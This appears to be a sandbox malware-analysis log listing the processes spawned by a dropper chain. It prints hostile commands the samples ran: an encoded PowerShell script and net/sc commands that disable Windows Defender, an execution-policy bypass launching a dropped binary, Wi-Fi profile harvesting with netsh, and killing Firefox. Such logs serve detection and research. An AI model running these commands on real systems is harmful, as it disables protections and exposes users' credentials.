Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\ClientAny.exe "C:\Users\user\AppData\Local\Temp\ClientAny.exe"
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7160 -s 996
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe "C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe "C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013678001\ae44c30d83.exe "C:\Users\user\AppData\Local\Temp\1013678001\ae44c30d83.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
Source: C:\Users\user\AppData\Local\Temp\1013678001\ae44c30d83.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe "C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe "C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe "C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013678001\ae44c30d83.exe "C:\Users\user\AppData\Local\Temp\1013678001\ae44c30d83.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\ClientAny.exe"' & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\ClientAny.exe"'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\ClientAny.exe "C:\Users\user\AppData\Local\Temp\ClientAny.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\net1.exe "C:\Windows\system32\net1.exe" start lsass
